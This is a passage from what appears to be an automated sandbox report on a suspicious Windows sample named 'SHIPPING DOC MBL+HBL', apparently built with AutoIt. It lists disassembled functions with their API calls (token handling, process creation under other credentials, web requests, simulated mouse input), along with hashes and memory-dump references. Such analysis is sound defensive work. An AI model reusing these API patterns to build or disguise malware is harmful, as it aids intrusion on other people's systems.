                    • Instruction Fuzzy Hash: 8F418435600244EFDB25DF24C489B947BE1FF45319F1842BAF94CAF2A2C732A846CB95
                    Function 00E771B3 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,00E74F57,?,?,00000000,00000001), ref: 00E771C1
                      • Part of subcall function 00E73AB6: GetWindowRect.USER32(?,?), ref: 00E73AC9
                    • GetDesktopWindow.USER32 ref: 00E771EB
                    • GetWindowRect.USER32(00000000), ref: 00E771F2
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00E77224
                      • Part of subcall function 00E652EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65363
                    • GetCursorPos.USER32(?), ref: 00E77250
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E772AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: 338d03a414ae211d86343e25967a54c284fb2b9d4940f265258ac7f97fb9c8fb
                    • Instruction ID: 4e166b4240fab8362f9565bd281caf52300f512a02d2658473d2157eb4535dab
                    • Opcode Fuzzy Hash: 338d03a414ae211d86343e25967a54c284fb2b9d4940f265258ac7f97fb9c8fb
                    • Instruction Fuzzy Hash: F9310472209305AFD720DF14D849B9BB7E9FF88304F001929F498A71A1CB30ED09CB92
                    Function 00E58B3B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E583D1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E583E8
                      • Part of subcall function 00E583D1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E583F2
                      • Part of subcall function 00E583D1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E58401
                      • Part of subcall function 00E583D1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E58408
                      • Part of subcall function 00E583D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E5841E
                    • GetLengthSid.ADVAPI32(?,00000000,00E58757), ref: 00E58B8C
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E58B98
                    • HeapAlloc.KERNEL32(00000000), ref: 00E58B9F
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E58BB8
                    • GetProcessHeap.KERNEL32(00000000,00000000,00E58757), ref: 00E58BCC
                    • HeapFree.KERNEL32(00000000), ref: 00E58BD3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 3008561057-0
                    • Opcode ID: 969c7f01ceaad6a3b7e96c2465951019d147bd89222e4a4280297dd33c5563f4
                    • Instruction ID: 87ab2e5bafdb63fc17460582d0453f2d19ba22686a76bf8e068505d15c7ebc91
                    • Opcode Fuzzy Hash: 969c7f01ceaad6a3b7e96c2465951019d147bd89222e4a4280297dd33c5563f4
                    • Instruction Fuzzy Hash: DC11B1B5901205FFDB909FA5CD09FAE77ACEB4531AF104828E949F7150CB319A08CB60
                    Function 00E588D9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E5890A
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00E58911
                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E58920
                    • CloseHandle.KERNEL32(00000004), ref: 00E5892B
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E5895A
                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E5896E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 1413079979-0
                    • Opcode ID: f419000132f29dc0462fba9e3d07c664718d32d6510f6e9c55d1d5b13aaa398a
                    • Instruction ID: 067a87ac6054105835385a861f7c55d444a634a0c081ef3a28afca0a3c0a954d
                    • Opcode Fuzzy Hash: f419000132f29dc0462fba9e3d07c664718d32d6510f6e9c55d1d5b13aaa398a
                    • Instruction Fuzzy Hash: 48115C72500209AFDF018FA5DD49BEA7BA9EF49319F144065FE08B2160C7768D68AB61
                    Function 00E202E2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E20313
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E2031B
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E20326
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E20331
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E20339
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E20341
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: 559457ea0a1c4adb0b58381e04bc51ca5cd8553ca50f1dd6d4907c48ce253a4e
                    • Instruction ID: 37620c0a6671a5cec699ac88e052411fee0bf3f1276c3770c25fc5cdfde5b358
                    • Opcode Fuzzy Hash: 559457ea0a1c4adb0b58381e04bc51ca5cd8553ca50f1dd6d4907c48ce253a4e
                    • Instruction Fuzzy Hash: 7F016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BE15C87941C7F5A868CBE5
                    Function 00E65490 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                    Download Yara Rule
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00E654A0
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00E654B6
                    • GetWindowThreadProcessId.USER32(?,?), ref: 00E654C5
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E654D4
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E654DE
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00E654E5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: 6ab56f2f22217a39d91cd373cfa83795e7b7d41cbc9954615523815618b6515c
                    • Instruction ID: 18a7f98f61b852f3bf53ed29642f54404d70d670f3a187d54aab213bdbbec69f
                    • Opcode Fuzzy Hash: 6ab56f2f22217a39d91cd373cfa83795e7b7d41cbc9954615523815618b6515c
                    • Instruction Fuzzy Hash: 16F06232241118BFD3215B93DC0DEAB7A7CEFCAB11F000169F909E1051E6A01A0597B5
                    Function 00E672D9 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 00E672EC
                    • EnterCriticalSection.KERNEL32(?,?,00E11044,?,?), ref: 00E672FD
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00E11044,?,?), ref: 00E6730A
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E11044,?,?), ref: 00E67317
                      • Part of subcall function 00E66CDE: CloseHandle.KERNEL32(00000000,?,00E67324,?,00E11044,?,?), ref: 00E66CE8
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E6732A
                    • LeaveCriticalSection.KERNEL32(?,?,00E11044,?,?), ref: 00E67331
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: 8a8951fc3f05f058a8a8b56555ab05abe2e9e4cfd886d247e0f9178ad2d13690
                    • Instruction ID: 5396533a83f5093d1ba1ac360436d1eb1fcafae24fb46fb4657cad1d0c767b7e
                    • Opcode Fuzzy Hash: 8a8951fc3f05f058a8a8b56555ab05abe2e9e4cfd886d247e0f9178ad2d13690
                    • Instruction Fuzzy Hash: 9EF08236581612EFE7111B65FD8C9DB773AFF49712B101531F506B10B1CB759815CBA0
                    Function 00E58C54 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E58C5F
                    • UnloadUserProfile.USERENV(?,?), ref: 00E58C6B
                    • CloseHandle.KERNEL32(?), ref: 00E58C74
                    • CloseHandle.KERNEL32(?), ref: 00E58C7C
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00E58C85
                    • HeapFree.KERNEL32(00000000), ref: 00E58C8C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                    • String ID:
                    • API String ID: 146765662-0
                    • Opcode ID: 6652bd9b19f8a72426b3e195c597f5b9e8190748296d57d689ec8977b1d0c289
                    • Instruction ID: 4f38d140f51314c040ab9ea8713d28c79b8c98bc657e8ccc59a5474d20c28a84
                    • Opcode Fuzzy Hash: 6652bd9b19f8a72426b3e195c597f5b9e8190748296d57d689ec8977b1d0c289
                    • Instruction Fuzzy Hash: B1E0C236004001FFDA011FE2EC0C90ABB69FB89322B108231F219E1075CB329428DB50
                    Function 00E57858 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                    Download Yara Rule
                    APIs
                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E57A12
                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E57A2A
                    • CLSIDFromProgID.OLE32(?,?,00000000,00E8FB80,000000FF,?,00000000,00000800,00000000,?,00E92C7C,?), ref: 00E57A4F
                    • _memcmp.LIBCMT ref: 00E57A70
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FromProg$FreeTask_memcmp
                    • String ID: ,,
                    • API String ID: 314563124-1556401989
                    • Opcode ID: 84b9a4a02824de28d88e3e321b75298e23e278c55797696b8363de4965330cdd
                    • Instruction ID: ca6eac77f5739dae48bd805df9932b0512756d3cc0fb98c2b680324902002d97
                    • Opcode Fuzzy Hash: 84b9a4a02824de28d88e3e321b75298e23e278c55797696b8363de4965330cdd
                    • Instruction Fuzzy Hash: FE810871A00109EFCB04DF94C884EEEB7B9FF89315F205598E955BB250DB71AE0ACB60
                    Function 00E78702 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 00E78728
                    • CharUpperBuffW.USER32(?,?), ref: 00E78837
                    • VariantClear.OLEAUT32(?), ref: 00E789AF
                      • Part of subcall function 00E6760B: VariantInit.OLEAUT32(00000000), ref: 00E6764B
                      • Part of subcall function 00E6760B: VariantCopy.OLEAUT32(00000000,?), ref: 00E67654
                      • Part of subcall function 00E6760B: VariantClear.OLEAUT32(00000000), ref: 00E67660
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: 654c541212af0e862101ccff561a7110f5b404dcf80f26ff21b659ea6aa5951b
                    • Instruction ID: defa822e4560129d978c2e01cd36c23f3c7d432373cbf45044f1840b9b9f5763
                    • Opcode Fuzzy Hash: 654c541212af0e862101ccff561a7110f5b404dcf80f26ff21b659ea6aa5951b
                    • Instruction Fuzzy Hash: 78918D756083019FC704DF24C58496ABBF4EFD8314F14996EF89AAB3A2DB30E945CB52
                    Function 00E62D8E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E1FE06: _wcscpy.LIBCMT ref: 00E1FE29
                    • _memset.LIBCMT ref: 00E62E7F
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E62EAE
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E62F61
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E62F8F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
                    • Opcode ID: 2551f0b007b4909b191802330d372a02f112409c572be32e1d9211cb7aa96b3f
                    • Instruction ID: 12632c956b27fb9c7f8d1c49a09eaceecf1abe1e6a4c15534e01452e91d02aee
                    • Opcode Fuzzy Hash: 2551f0b007b4909b191802330d372a02f112409c572be32e1d9211cb7aa96b3f
                    • Instruction Fuzzy Hash: 985101317487019ED7259F28E844A6BB7F4AF95398F042A2DFA94F31D1DB71CC448792
                    Function 00E62A4B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E62AB8
                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E62AD4
                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00E62B1A
                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00EC5890,00000000), ref: 00E62B63
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: 7c20815738d2c8d5dd1cf5a45031ec74d64ddbda71b5ebf33814cffb1407b421
                    • Instruction ID: bba59333bda6beb893c224bb7c0e98dd6f9e7cdc404e508a9200ca014f384150
                    • Opcode Fuzzy Hash: 7c20815738d2c8d5dd1cf5a45031ec74d64ddbda71b5ebf33814cffb1407b421
                    • Instruction Fuzzy Hash: 5E41D2306447029FD720DF24E885B2ABBE8EF84364F10462DFAA5B72D1D770E904CB62
                    Function 00E7D8B9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E7D8D9
                      • Part of subcall function 00E079AB: _memmove.LIBCMT ref: 00E079F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BuffCharLower_memmove
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 3425801089-567219261
                    • Opcode ID: 4cac335eb23c29604aadc6fc2190983a62918705ddd4b428e1640bb63de96e42
                    • Instruction ID: 0e60556b6840314079aff8c4a28a19ddf177134f918e6380c372f8fadf4f8037
                    • Opcode Fuzzy Hash: 4cac335eb23c29604aadc6fc2190983a62918705ddd4b428e1640bb63de96e42
                    • Instruction Fuzzy Hash: 3931C471A04615AFCF00EF54CC919EEB3F4FF85324B10962AE9A9B76D1DB71A905CB80
                    Function 00E59152 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                      • Part of subcall function 00E5AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AEC7
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00E591D6
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00E591E9
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00E59219
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: 7029a2b96e2095433e91fa3bdf0d6a7e7f9508ad72cd3c2684e71c2081f72575
                    • Instruction ID: b567137e013d1abd48ebcfb0eabb92a87257148e396afe778f4a8780e60d8cf7
                    • Opcode Fuzzy Hash: 7029a2b96e2095433e91fa3bdf0d6a7e7f9508ad72cd3c2684e71c2081f72575
                    • Instruction Fuzzy Hash: E9210635A00104BFDB14AB64DC858FFB7B8DF45360F146629F869B71E1DB341D4E9610
                    Function 00E71943 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E71962
                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E71988
                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E719B8
                    • InternetCloseHandle.WININET(00000000), ref: 00E719FF
                      • Part of subcall function 00E72599: GetLastError.KERNEL32(?,?,00E7192D,00000000,00000000,00000001), ref: 00E725AE
                      • Part of subcall function 00E72599: SetEvent.KERNEL32(?,?,00E7192D,00000000,00000000,00000001), ref: 00E725C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                    • String ID:
                    • API String ID: 3113390036-3916222277
                    • Opcode ID: 8d8be4665d7d69483c60d6186f28bb19a62c8b8e5537752c36f83c0468c14a6c
                    • Instruction ID: cd5ee6fbfc83f42b12fe94f53da4b969edda507b95c89c6ce7093c89b49a8f09
                    • Opcode Fuzzy Hash: 8d8be4665d7d69483c60d6186f28bb19a62c8b8e5537752c36f83c0468c14a6c
                    • Instruction Fuzzy Hash: CB21C5B2500309BFEB119F64DC95EBF77ECEB88744F10915AF509B6100EB259E095761
                    Function 00E86419 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E01D73
                      • Part of subcall function 00E01D35: GetStockObject.GDI32(00000011), ref: 00E01D87
                      • Part of subcall function 00E01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E01D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E86493
                    • LoadLibraryW.KERNEL32(?), ref: 00E8649A
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E864AF
                    • DestroyWindow.USER32(?), ref: 00E864B7
                    Strings
                    Memory Dump Source
